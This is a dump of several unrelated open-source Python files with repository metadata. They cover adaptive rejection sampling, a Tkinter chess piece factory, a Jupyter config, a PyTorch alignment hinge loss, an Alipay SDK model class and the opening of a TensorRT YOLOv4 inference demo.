# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
# WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#############################################################################
import numpy
import scipy.stats as stats
# TO DO:
# Throw errors in the sample_hull routine
def ars(domain, isDomainFinite, abcissae, hx, hpx, nsamples=1, hxparams=(), maxn=100):
"""ars: Implementation of the Adaptive-Rejection Sampling
algorithm by Gilks & Wild (1992): Adaptive Rejection Sampling
for Gibbs Sampling, Applied Statistics, 41, 337
Based on Wild & Gilks (1993), Algorithm AS 287: Adaptive Rejection
Sampling from Log-concave Density Functions, Applied Statistics, 42, 701
Input:
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
       abcissae - initial list of abcissae (must lie on either side of the peak in hx if the domain is unbounded)
hx - function that evaluates h(x) = ln g(x)
hpx - function that evaluates hp(x) = d h(x) / d x
nsamples - (optional) number of desired samples (default=1)
hxparams - (optional) a tuple of parameters for h(x) and h'(x)
maxn - (optional) maximum number of updates to the hull (default=100)
Output:
list with nsamples of samples from exp(h(x))
External dependencies:
math
scipy
scipy.stats
History:
2009-05-21 - Written - Bovy (NYU)
"""
# First set-up the upper and lower hulls
hull = setup_hull(domain, isDomainFinite, abcissae, hx, hpx, hxparams)
# Then start sampling: call sampleone repeatedly
out = []
nupdates = 0
for ii in range(int(nsamples)):
thissample, hull, nupdates = sampleone(
hull, hx, hpx, domain, isDomainFinite, maxn, nupdates, hxparams
)
out.append(thissample)
return out
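# Hedged usage sketch (not part of the original module): drawing samples from a standard
# normal, whose log-density h(x) = -x^2/2 is log-concave. The helper names are illustrative.
def _ars_standard_normal_example(nsamples=10):
    def _h(x, params):
        return -0.5 * x**2
    def _hp(x, params):
        return -x
    # Unbounded domain, so the domain limits are ignored and the initial abcissae
    # must straddle the peak at x = 0.
    return ars([0., 0.], [False, False], [-1., 1.], _h, _hp, nsamples=nsamples)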
def setup_hull(domain, isDomainFinite, abcissae, hx, hpx, hxparams):
"""setup_hull: set up the upper and lower hull and everything that
comes with that
Input:
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
abcissae - initial list of abcissae (must lie on either side
                  of the peak in hx if the domain is unbounded)
hx - function that evaluates h(x)
hpx - function that evaluates hp(x)
hxparams - tuple of parameters for h(x) and h'(x)
Output:
list with:
[0]= c_u
[1]= xs
[2]= h(xs)
[3]= hp(xs)
[4]= zs
[5]= s_cum
[6]= hu(zi)
History:
2009-05-21 - Written - Bovy (NYU)
"""
nx = len(abcissae)
# Create the output arrays
xs = numpy.zeros(nx)
hxs = numpy.zeros(nx)
hpxs = numpy.zeros(nx)
zs = numpy.zeros(nx - 1)
scum = numpy.zeros(nx - 1)
hus = numpy.zeros(nx - 1)
# Function evaluations
xs = numpy.sort(abcissae)
for ii in range(nx):
hxs[ii] = hx(xs[ii], hxparams)
hpxs[ii] = hpx(xs[ii], hxparams)
# THERE IS NO CHECKING HERE TO SEE WHETHER IN THE INFINITE DOMAIN CASE
# WE HAVE ABCISSAE ON BOTH SIDES OF THE PEAK
# zi
for jj in range(nx - 1):
zs[jj] = (
hxs[jj + 1] - hxs[jj] - xs[jj + 1] * hpxs[jj + 1] + xs[jj] * hpxs[jj]
) / (hpxs[jj] - hpxs[jj + 1])
# hu
for jj in range(nx - 1):
hus[jj] = hpxs[jj] * (zs[jj] - xs[jj]) + hxs[jj]
# Calculate cu and scum
if isDomainFinite[0]:
scum[0] = (
1.0
/ hpxs[0]
* (numpy.exp(hus[0]) - numpy.exp(hpxs[0] * (domain[0] - xs[0]) + hxs[0]))
)
else:
scum[0] = 1.0 / hpxs[0] * numpy.exp(hus[0])
if nx > 2:
for jj in range(nx - 2):
if hpxs[jj + 1] == 0.0:
scum[jj + 1] = (zs[jj + 1] - zs[jj]) * numpy.exp(hxs[jj + 1])
else:
scum[jj + 1] = (
1.0 / hpxs[jj + 1] * (numpy.exp(hus[jj + 1]) - numpy.exp(hus[jj]))
)
if isDomainFinite[1]:
cu = (
1.0
/ hpxs[nx - 1]
* (
numpy.exp(hpxs[nx - 1] * (domain[1] - xs[nx - 1]) + hxs[nx - 1])
- numpy.exp(hus[nx - 2])
)
)
else:
cu = -1.0 / hpxs[nx - 1] * numpy.exp(hus[nx - 2])
cu = cu + numpy.sum(scum)
scum = numpy.cumsum(scum) / cu
out = []
out.append(cu)
out.append(xs)
out.append(hxs)
out.append(hpxs)
out.append(zs)
out.append(scum)
out.append(hus)
return out
def sampleone(hull, hx, hpx, domain, isDomainFinite, maxn, nupdates, hxparams):
"""sampleone: sample one point by ars
Input:
hull - the hull (see doc of setup_hull for definition)
hx - function that evaluates h(x)
hpx - function that evaluates hp(x)
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
maxn - maximum number of updates to the hull
nupdates - number of updates to the hull that have occurred
hxparams - tuple of parameters for h(x) and h'(x)
Output:
a sample
a new hull
nupdates
History:
2009-05-21 - Written - Bovy (NYU)
"""
thishull = hull
noSampleYet = True
while noSampleYet:
# Sample a candidate from the upper hull
candidate = sample_hull(thishull, domain, isDomainFinite)
thishux, thishlx = evaluate_hull(candidate, thishull)
u = stats.uniform.rvs()
if u < numpy.exp(thishlx - thishux):
thissample = candidate
noSampleYet = False
else:
thishx = hx(candidate, hxparams)
if u < numpy.exp(thishx - thishux):
thissample = candidate
noSampleYet = False
if nupdates < maxn:
thishpx = hpx(candidate, hxparams)
thishull = update_hull(
thishull, candidate, thishx, thishpx, domain, isDomainFinite
)
nupdates = nupdates + 1
return thissample, thishull, nupdates
def sample_hull(hull, domain, isDomainFinite):
"""sample_hull: Sample the upper hull
Input:
hull - hull structure (see setup_hull for a definition of this)
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
Output:
a sample from the hull
History:
2009-05-21 - Written - Bovy
"""
u = stats.uniform.rvs()
# Find largest zs[jj] such that scum[jj] < u
# The first bin is a special case
if hull[5][0] >= u:
if hull[3][0] == 0:
if isDomainFinite[0]:
thissample = domain[0] + u / hull[5][0] * (hull[4][0] - domain[0])
else:
thissample = 100000000 # Throw some kind of error
else:
thissample = hull[4][0] + 1.0 / hull[3][0] * numpy.log(
1.0 - hull[3][0] * hull[0] * (hull[5][0] - u) / numpy.exp(hull[6][0])
)
else:
if len(hull[5]) == 1:
indx = 0
else:
indx = 1
while indx < len(hull[5]) and hull[5][indx] < u:
indx = indx + 1
indx = indx - 1
if numpy.fabs(hull[3][indx + 1]) == 0:
if indx != (len(hull[5]) - 1):
thissample = hull[4][indx] + (u - hull[5][indx]) / (
hull[5][indx + 1] - hull[5][indx]
) * (hull[4][indx + 1] - hull[4][indx])
else:
if isDomainFinite[1]:
thissample = hull[4][indx] + (u - hull[5][indx]) / (
1.0 - hull[5][indx]
) * (domain[1] - hull[4][indx])
else:
thissample = 100000 # Throw some kind of error
else:
thissample = hull[4][indx] + 1.0 / hull[3][indx + 1] * numpy.log(
1.0
+ hull[3][indx + 1]
* hull[0]
* (u - hull[5][indx])
/ numpy.exp(hull[6][indx])
)
return thissample
def evaluate_hull(x, hull):
"""evaluate_hull: evaluate h_u(x) and (optional) h_l(x)
Input:
x - abcissa
hull - the hull (see setup_hull for a definition)
Output:
hu(x) (optional), hl(x)
History:
2009-05-21 - Written - Bovy (NYU)
"""
# Find in which [z_{i-1},z_i] interval x lies
if x < hull[4][0]:
# x lies in the first interval
hux = hull[3][0] * (x - hull[1][0]) + hull[2][0]
indx = 0
else:
if len(hull[5]) == 1:
# There are only two intervals
indx = 1
else:
indx = 1
while indx < len(hull[4]) and hull[4][indx] < x:
indx = indx + 1
indx = indx - 1
hux = hull[3][indx] * (x - hull[1][indx]) + hull[2][indx]
# Now evaluate hlx
neginf = numpy.finfo(numpy.dtype(numpy.float64)).min
if x < hull[1][0] or x > hull[1][-1]:
hlx = neginf
else:
if indx == 0:
hlx = ((hull[1][1] - x) * hull[2][0] + (x - hull[1][0]) * hull[2][1]) / (
hull[1][1] - hull[1][0]
)
elif indx == len(hull[4]):
hlx = (
(hull[1][-1] - x) * hull[2][-2] + (x - hull[1][-2]) * hull[2][-1]
) / (hull[1][-1] - hull[1][-2])
elif x < hull[1][indx + 1]:
hlx = (
(hull[1][indx + 1] - x) * hull[2][indx]
+ (x - hull[1][indx]) * hull[2][indx + 1]
) / (hull[1][indx + 1] - hull[1][indx])
else:
hlx = (
(hull[1][indx + 2] - x) * hull[2][indx + 1]
+ (x - hull[1][indx + 1]) * hull[2][indx + 2]
) / (hull[1][indx + 2] - hull[1][indx + 1])
return hux, hlx
def update_hull(hull, newx, newhx, newhpx, domain, isDomainFinite):
"""update_hull: update the hull with a new function evaluation
Input:
hull - the current hull (see setup_hull for a definition)
newx - a new abcissa
newhx - h(newx)
newhpx - hp(newx)
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
Output:
newhull
History:
2009-05-21 - Written - Bovy (NYU)
"""
# BOVY: Perhaps add a check that newx is sufficiently far from any existing point
# Find where newx fits in with the other xs
if newx > hull[1][-1]:
newxs = numpy.append(hull[1], newx)
newhxs = numpy.append(hull[2], newhx)
newhpxs = numpy.append(hull[3], newhpx)
# new z
newz = (newhx - hull[2][-1] - newx * newhpx + hull[1][-1] * hull[3][-1]) / (
hull[3][-1] - newhpx
)
newzs = numpy.append(hull[4], newz)
# New hu
newhu = hull[3][-1] * (newz - hull[1][-1]) + hull[2][-1]
newhus = numpy.append(hull[6], newhu)
else:
indx = 0
while newx > hull[1][indx]:
indx = indx + 1
newxs = numpy.insert(hull[1], indx, newx)
newhxs = numpy.insert(hull[2], indx, newhx)
newhpxs = numpy.insert(hull[3], indx, newhpx)
# Replace old z with new zs
if newx < hull[1][0]:
newz = (hull[2][0] - newhx - hull[1][0] * hull[3][0] + newx * newhpx) / (
newhpx - hull[3][0]
)
newzs = numpy.insert(hull[4], 0, newz)
# Also add the new hu
newhu = newhpx * (newz - newx) + newhx
newhus = numpy.insert(hull[6], 0, newhu)
else:
newz1 = (
newhx
- hull[2][indx - 1]
- newx * newhpx
+ hull[1][indx - 1] * hull[3][indx - 1]
) / (hull[3][indx - 1] - newhpx)
newz2 = (
hull[2][indx] - newhx - hull[1][indx] * hull[3][indx] + newx * newhpx
) / (newhpx - hull[3][indx])
# Insert newz1 and replace z_old
newzs = numpy.insert(hull[4], indx - 1, newz1)
newzs[indx] = newz2
# Update the hus
newhu1 = hull[3][indx - 1] * (newz1 - hull[1][indx - 1]) + hull[2][indx - 1]
newhu2 = newhpx * (newz2 - newx) + newhx
newhus = numpy.insert(hull[6], indx - 1, newhu1)
newhus[indx] = newhu2
# Recalculate the cumulative sum
nx = len(newxs)
newscum = numpy.zeros(nx - 1)
if isDomainFinite[0]:
newscum[0] = (
1.0
/ newhpxs[0]
* (
numpy.exp(newhus[0])
- numpy.exp(newhpxs[0] * (domain[0] - newxs[0]) + newhxs[0])
)
)
else:
newscum[0] = 1.0 / newhpxs[0] * numpy.exp(newhus[0])
if nx > 2:
for jj in range(nx - 2):
if newhpxs[jj + 1] == 0.0:
newscum[jj + 1] = (newzs[jj + 1] - newzs[jj]) * numpy.exp(
newhxs[jj + 1]
)
else:
newscum[jj + 1] = (
1.0
/ newhpxs[jj + 1]
* (numpy.exp(newhus[jj + 1]) - numpy.exp(newhus[jj]))
)
if isDomainFinite[1]:
newcu = (
1.0
/ newhpxs[nx - 1]
* (
numpy.exp(
newhpxs[nx - 1] * (domain[1] - newxs[nx - 1]) + newhxs[nx - 1]
)
- numpy.exp(newhus[nx - 2])
)
)
else:
newcu = -1.0 / newhpxs[nx - 1] * numpy.exp(newhus[nx - 2])
newcu = newcu + numpy.sum(newscum)
newscum = numpy.cumsum(newscum) / newcu
newhull = []
newhull.append(newcu)
newhull.append(newxs)
newhull.append(newhxs)
newhull.append(newhpxs)
newhull.append(newzs)
newhull.append(newscum)
newhull.append(newhus)
return newhull
|
68a443df7d426bb63c7fdc04bde250bba9b445ed
|
20f125a17856c1251727314c571091a59bc770f0
|
/Chapter 04/4.02/piece.py
|
77f9bbb6f593ec22563b46e2b0509c024b65ca8d
|
[
"MIT"
] |
permissive
|
PacktPublishing/Tkinter-GUI-Application-Development-Blueprints-Second-Edition
|
310983285d54c59bdd02e69b9a913aa9372c869a
|
1e160c0575028e446295c121a84142164ee5ced2
|
refs/heads/master
| 2023-07-10T05:34:39.159752
| 2023-01-30T09:20:16
| 2023-01-30T09:20:16
| 123,231,531
| 142
| 94
|
MIT
| 2023-07-03T23:09:32
| 2018-02-28T04:59:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,121
|
py
|
piece.py
|
"""
Code illustration: 4.02
@ Tkinter GUI Application Development Blueprints
"""
from configurations import *
import exceptions
def create_piece(piece, color='white'):
    # Map a single-letter short name (e.g. 'k' / 'K') or a full piece name to a Piece
    # instance; lowercase short names produce black pieces, uppercase white ones.
if isinstance(piece, str):
if piece.upper() in SHORT_NAME.keys():
color = "white" if piece.isupper() else "black"
piece = SHORT_NAME[piece.upper()]
piece = piece.capitalize()
if piece in SHORT_NAME.values():
return eval("{classname}(color)".format(classname=piece))
raise exceptions.ChessError("invalid piece name: '{}'".format(piece))
class Piece():
def __init__(self, color):
self.name = self.__class__.__name__.lower()
if color == 'black':
self.name = self.name.lower()
elif color == 'white':
self.name = self.name.upper()
self.color = color
def keep_reference(self, model):
self.model = model
class King(Piece):
pass
class Queen(Piece):
pass
class Rook(Piece):
pass
class Bishop(Piece):
pass
class Knight(Piece):
pass
class Pawn(Piece):
pass
|
b55392cb9b7fdd97444e6142995ac63269f81428
|
bbd69601912a3361d788efd03a47f9d4e3bac09e
|
/docs/sphinx/rest_substitutions/snippets/python/converted/wx.propgrid.PGProperty.3.py
|
b7f0f65a052e8169d7d478cf55c358f8807141a1
|
[] |
no_license
|
wxWidgets/Phoenix
|
56929484460a0399a8f1d9582bc77c20aa14748d
|
a1184286703cf24c4b88e5bc14cf2979c1b1ea00
|
refs/heads/master
| 2023-09-01T07:10:17.437093
| 2023-08-31T05:38:01
| 2023-08-31T05:38:01
| 5,078,061
| 2,268
| 677
| null | 2023-09-09T17:06:59
| 2012-07-17T06:22:25
|
Python
|
UTF-8
|
Python
| false
| false
| 49
|
py
|
wx.propgrid.PGProperty.3.py
|
self.SetFlag(wx.propgrid.PG_PROP_NO_ESCAPE)
|
961f61f00e4e454e93c452be088594aaf02b3062
|
d35f84342277856dff06e20bb4a433382f9f7f54
|
/machine-learning-ui/jupyter_notebook_config.py
|
4945cae84d8808ee948ebb9b6e437760cd33aa89
|
[] |
no_license
|
clearlinux/dockerfiles
|
3d7f03f0948e8f9146b55794c2aaa290221d5b23
|
7c37f38dd540da9107854c1dea2609340978ba2d
|
refs/heads/master
| 2022-12-28T15:31:30.529825
| 2022-09-30T23:20:10
| 2022-09-30T23:20:10
| 66,385,562
| 158
| 262
| null | 2021-12-17T16:30:23
| 2016-08-23T16:48:27
|
Shell
|
UTF-8
|
Python
| false
| false
| 178
|
py
|
jupyter_notebook_config.py
|
c = get_config()
# Serve notebooks from /root inside the container.
c.ContentsManager.root_dir = "/root/"
# The container runs as root, so allow it explicitly and listen on all interfaces
# so the published port is reachable from the host.
c.NotebookApp.allow_root = True
c.NotebookApp.ip = '0.0.0.0'
# Headless image: never try to open a browser; expose the default notebook port.
c.NotebookApp.open_browser = False
c.NotebookApp.port = 8888
|
9a57adaf556646a0caa64f27e8cc8e1300a2b5bf
|
5f1881006aaf4f3c2515f375ad29c15fd6612de2
|
/interactive_text_to_sql/src/loss.py
|
321ed87275f1bb64708930b5e706b0fd4f67acf6
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unknown-license-reference",
"LGPL-2.1-or-later",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
microsoft/ContextualSP
|
4edb598d40f683f9a1143b92a9d24e1066d51ec4
|
4198ebce942f4afe7ddca6a96ab6f4464ade4518
|
refs/heads/master
| 2023-08-02T22:08:40.503853
| 2023-07-14T07:22:50
| 2023-07-14T07:22:50
| 255,534,819
| 332
| 70
|
MIT
| 2023-07-25T19:23:48
| 2020-04-14T07:01:54
|
Python
|
UTF-8
|
Python
| false
| false
| 5,515
|
py
|
loss.py
|
# coding: utf-8
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from src.utils.algo_utils import BipartiteGraphSolver
class HingeLoss(nn.Module):
def __init__(self, margin=0.6, aggregation='max', l1_norm_weight=0, entropy_norm_weight=0):
super(HingeLoss, self).__init__()
self.margin = margin
self.aggregation = aggregation
self.l1_norm_weight = l1_norm_weight
self.entropy_norm_weight = entropy_norm_weight
self.bipartite_graph_solver = BipartiteGraphSolver()
def forward(self, pos_align, neg_align, lengths):
# src_lengths, pos_tgt_lengths, neg_tgt_lengths = lengths
positive_lengths, negative_lengths = lengths
positive_lengths = positive_lengths.permute(1, 0)
negative_lengths = negative_lengths.permute(1, 0)
src_lengths = positive_lengths[0]
pos_tgt_lengths = positive_lengths[1]
neg_tgt_lengths = negative_lengths[1]
'''
temp = torch.sqrt(torch.FloatTensor([self.args.hidden_size * 2]))
if self.args.cuda:
temp = temp.cuda()
pos_align = torch.div(pos_align, temp)
neg_align = torch.div(neg_align, temp)
'''
# print('pos_align', pos_align)
# print('neg_align', neg_align)
positive_n = sum(positive_lengths[0] * positive_lengths[1])
        negative_n = sum(negative_lengths[0] * negative_lengths[1])  # source_len * target_len, mirroring positive_n
pos_l1_norm, neg_l1_norm = torch.norm(pos_align, p=1) / positive_n, torch.norm(neg_align, p=1) / negative_n
# print('pos_norm', type(pos_l1_norm), pos_l1_norm)
# print('neg_norm', type(neg_l1_norm), neg_l1_norm)
# print('pos_norm', pos_align)
# print('neg_norm', neg_align)
# Entropy loss
pos_row_entropy = F.softmax(pos_align, dim=-1) * F.log_softmax(pos_align, dim=-1)
neg_row_entropy = F.softmax(neg_align, dim=-1) * F.log_softmax(neg_align, dim=-1)
pos_row_entropy = -1 * pos_row_entropy.sum()
neg_row_entropy = -1 * neg_row_entropy.sum()
pos_col_entropy = F.softmax(pos_align, dim=0) * F.log_softmax(pos_align, dim=0)
neg_col_entropy = F.softmax(neg_align, dim=0) * F.log_softmax(neg_align, dim=0)
pos_col_entropy = -1 * pos_col_entropy.sum()
neg_col_entropy = -1 * neg_col_entropy.sum()
entropy_norm = pos_row_entropy - neg_row_entropy + pos_col_entropy - neg_col_entropy
# print('entropy', type(entropy_norm), entropy_norm)
if self.aggregation == 'max':
pos_align_score, neg_align_score = torch.max(pos_align, -1)[0], torch.max(neg_align, -1)[0]
elif self.aggregation == 'sum':
pos_align_score, neg_align_score = torch.sum(pos_align, -1), torch.sum(neg_align, -1)
pos_align_score = torch.div(pos_align_score, src_lengths.float().reshape((-1, 1)))
neg_align_score = torch.div(neg_align_score, src_lengths.float().reshape((-1, 1)))
elif self.aggregation == 'match':
pos_align_score = 0
pos_matrix = [x.detach().cpu().numpy() for x in pos_align]
pos_assignment_positions = [self.bipartite_graph_solver.find_max(x)[1] for x in pos_matrix]
for idx, pos_assignment_position in enumerate(pos_assignment_positions):
for x, y in zip(*pos_assignment_position):
pos_align_score += pos_align[idx, x, y]
pos_align_score /= sum(positive_lengths[0])
# pos_assignment = [list(zip([i] * len(pos_assignment_positions[0][0]),
# pos_assignment_positions[i][0],
# pos_assignment_positions[i][1]))
# for i in range(len(pos_assignment_positions))]
# pos_assignment = [_ for x in pos_assignment for _ in x]
neg_align_score = 0
neg_matrix = [x.detach().cpu().numpy() for x in neg_align]
neg_assignment_positions = [self.bipartite_graph_solver.find_max(x)[1] for x in neg_matrix]
for idx, neg_assignment_position in enumerate(neg_assignment_positions):
for x, y in zip(*neg_assignment_position):
neg_align_score += neg_align[idx, x, y]
neg_align_score /= sum(negative_lengths[0])
pass
# neg_assignment = [list(zip([i] * len(neg_assignment_positions[0][0]),
# neg_assignment_positions[i][0],
# neg_assignment_positions[i][1]))
# for i in range(len(neg_assignment_positions))]
# neg_assignment = [_ for x in neg_assignment for _ in x]
# pos_align_score = sum([pos_align[point] for point in pos_assignment])
# neg_align_score = sum([neg_align[point] for point in neg_assignment])
else:
raise ValueError("Hinge loss only supports max/sum aggregation.")
pos_align_score = torch.sum(pos_align_score, -1)
neg_align_score = torch.sum(neg_align_score, -1)
pos_align_score = torch.div(pos_align_score, pos_tgt_lengths.float())
neg_align_score = torch.div(neg_align_score, neg_tgt_lengths.float())
hinge_loss = torch.mean(torch.clamp(self.margin - (pos_align_score - neg_align_score), min=0.0)) + \
self.l1_norm_weight * (pos_l1_norm + neg_l1_norm) + self.entropy_norm_weight * entropy_norm
return hinge_loss
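# Hedged smoke test (not part of the original module; tensor shapes are illustrative only):
# alignment matrices are (batch, source_len, target_len) and each lengths tensor holds one
# (source_len, target_len) pair per example. Uses the 'max' aggregation branch above.
def _hinge_loss_smoke_test():
    loss_fn = HingeLoss(margin=0.6, aggregation='max')
    pos_align = torch.randn(2, 5, 7)
    neg_align = torch.randn(2, 5, 7)
    lengths = (torch.tensor([[5, 7], [5, 7]]), torch.tensor([[5, 7], [5, 7]]))
    return loss_fn(pos_align, neg_align, lengths)  # scalar hinge loss tensor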
|
86d20c146bf3ae8e4766a09dfa93311a0ab2b6a6
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/KoubeiRetailWmsWarehouseQueryModel.py
|
0563209f7007070edfd9ebf9446b4b27ddd92894
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,122
|
py
|
KoubeiRetailWmsWarehouseQueryModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OperateContext import OperateContext
class KoubeiRetailWmsWarehouseQueryModel(object):
def __init__(self):
self._city_code = None
self._operate_context = None
self._own_type = None
self._owner_id = None
self._page_no = None
self._page_size = None
self._warehouse_code = None
@property
def city_code(self):
return self._city_code
@city_code.setter
def city_code(self, value):
self._city_code = value
@property
def operate_context(self):
return self._operate_context
@operate_context.setter
def operate_context(self, value):
if isinstance(value, OperateContext):
self._operate_context = value
else:
self._operate_context = OperateContext.from_alipay_dict(value)
@property
def own_type(self):
return self._own_type
@own_type.setter
def own_type(self, value):
self._own_type = value
@property
def owner_id(self):
return self._owner_id
@owner_id.setter
def owner_id(self, value):
self._owner_id = value
@property
def page_no(self):
return self._page_no
@page_no.setter
def page_no(self, value):
self._page_no = value
@property
def page_size(self):
return self._page_size
@page_size.setter
def page_size(self, value):
self._page_size = value
@property
def warehouse_code(self):
return self._warehouse_code
@warehouse_code.setter
def warehouse_code(self, value):
self._warehouse_code = value
def to_alipay_dict(self):
params = dict()
if self.city_code:
if hasattr(self.city_code, 'to_alipay_dict'):
params['city_code'] = self.city_code.to_alipay_dict()
else:
params['city_code'] = self.city_code
if self.operate_context:
if hasattr(self.operate_context, 'to_alipay_dict'):
params['operate_context'] = self.operate_context.to_alipay_dict()
else:
params['operate_context'] = self.operate_context
if self.own_type:
if hasattr(self.own_type, 'to_alipay_dict'):
params['own_type'] = self.own_type.to_alipay_dict()
else:
params['own_type'] = self.own_type
if self.owner_id:
if hasattr(self.owner_id, 'to_alipay_dict'):
params['owner_id'] = self.owner_id.to_alipay_dict()
else:
params['owner_id'] = self.owner_id
if self.page_no:
if hasattr(self.page_no, 'to_alipay_dict'):
params['page_no'] = self.page_no.to_alipay_dict()
else:
params['page_no'] = self.page_no
if self.page_size:
if hasattr(self.page_size, 'to_alipay_dict'):
params['page_size'] = self.page_size.to_alipay_dict()
else:
params['page_size'] = self.page_size
if self.warehouse_code:
if hasattr(self.warehouse_code, 'to_alipay_dict'):
params['warehouse_code'] = self.warehouse_code.to_alipay_dict()
else:
params['warehouse_code'] = self.warehouse_code
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiRetailWmsWarehouseQueryModel()
if 'city_code' in d:
o.city_code = d['city_code']
if 'operate_context' in d:
o.operate_context = d['operate_context']
if 'own_type' in d:
o.own_type = d['own_type']
if 'owner_id' in d:
o.owner_id = d['owner_id']
if 'page_no' in d:
o.page_no = d['page_no']
if 'page_size' in d:
o.page_size = d['page_size']
if 'warehouse_code' in d:
o.warehouse_code = d['warehouse_code']
return o
|
924df92b9dc49ff124a0e07110337fb4de72d08c
|
1fbee8652452fb9d12ff499433b23e4b57782c59
|
/demo_trt.py
|
7f096639d21823922f5e889a1fac5f9c2d9e6a24
|
[
"Apache-2.0"
] |
permissive
|
Tianxiaomo/pytorch-YOLOv4
|
9301a83b85c610dfdfb99f2cb0ea2ea35fe6f660
|
a65d219f9066bae4e12003bd7cdc04531860c672
|
refs/heads/master
| 2023-09-02T04:40:58.172157
| 2021-12-12T12:11:07
| 2021-12-12T12:11:07
| 258,745,062
| 4,831
| 1,672
|
Apache-2.0
| 2023-07-23T13:20:24
| 2020-04-25T10:11:33
|
Python
|
UTF-8
|
Python
| false
| false
| 7,191
|
py
|
demo_trt.py
|
import sys
import os
import time
import argparse
import numpy as np
import cv2
# from PIL import Image
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
from tool.utils import *
try:
    # Python 2 does not define FileNotFoundError
FileNotFoundError
except NameError:
FileNotFoundError = IOError
def GiB(val):
return val * 1 << 30
def find_sample_data(description="Runs a TensorRT Python sample", subfolder="", find_files=[]):
'''
Parses sample arguments.
Args:
description (str): Description of the sample.
subfolder (str): The subfolder containing data relevant to this sample
        find_files (list): A list of filenames to find. Each filename will be replaced with an absolute path.
Returns:
str: Path of data directory.
Raises:
FileNotFoundError
'''
# Standard command-line arguments for all samples.
kDEFAULT_DATA_ROOT = os.path.join(os.sep, "usr", "src", "tensorrt", "data")
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-d", "--datadir", help="Location of the TensorRT sample data directory.", default=kDEFAULT_DATA_ROOT)
args, unknown_args = parser.parse_known_args()
# If data directory is not specified, use the default.
data_root = args.datadir
# If the subfolder exists, append it to the path, otherwise use the provided path as-is.
subfolder_path = os.path.join(data_root, subfolder)
data_path = subfolder_path
if not os.path.exists(subfolder_path):
print("WARNING: " + subfolder_path + " does not exist. Trying " + data_root + " instead.")
data_path = data_root
# Make sure data directory exists.
if not (os.path.exists(data_path)):
raise FileNotFoundError(data_path + " does not exist. Please provide the correct data path with the -d option.")
# Find all requested files.
for index, f in enumerate(find_files):
find_files[index] = os.path.abspath(os.path.join(data_path, f))
if not os.path.exists(find_files[index]):
raise FileNotFoundError(find_files[index] + " does not exist. Please provide the correct data path with the -d option.")
return data_path, find_files
# Simple helper data class that's a little nicer to use than a 2-tuple.
class HostDeviceMem(object):
def __init__(self, host_mem, device_mem):
self.host = host_mem
self.device = device_mem
def __str__(self):
return "Host:\n" + str(self.host) + "\nDevice:\n" + str(self.device)
def __repr__(self):
return self.__str__()
# Allocates all buffers required for an engine, i.e. host/device inputs/outputs.
def allocate_buffers(engine, batch_size):
inputs = []
outputs = []
bindings = []
stream = cuda.Stream()
for binding in engine:
size = trt.volume(engine.get_binding_shape(binding)) * batch_size
dims = engine.get_binding_shape(binding)
# in case batch dimension is -1 (dynamic)
if dims[0] < 0:
size *= -1
dtype = trt.nptype(engine.get_binding_dtype(binding))
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
return inputs, outputs, bindings, stream
# This function is generalized for multiple inputs/outputs.
# inputs and outputs are expected to be lists of HostDeviceMem objects.
def do_inference(context, bindings, inputs, outputs, stream):
# Transfer input data to the GPU.
[cuda.memcpy_htod_async(inp.device, inp.host, stream) for inp in inputs]
# Run inference.
context.execute_async(bindings=bindings, stream_handle=stream.handle)
# Transfer predictions back from the GPU.
[cuda.memcpy_dtoh_async(out.host, out.device, stream) for out in outputs]
# Synchronize the stream
stream.synchronize()
# Return only the host outputs.
return [out.host for out in outputs]
TRT_LOGGER = trt.Logger()
def main(engine_path, image_path, image_size):
with get_engine(engine_path) as engine, engine.create_execution_context() as context:
buffers = allocate_buffers(engine, 1)
IN_IMAGE_H, IN_IMAGE_W = image_size
context.set_binding_shape(0, (1, 3, IN_IMAGE_H, IN_IMAGE_W))
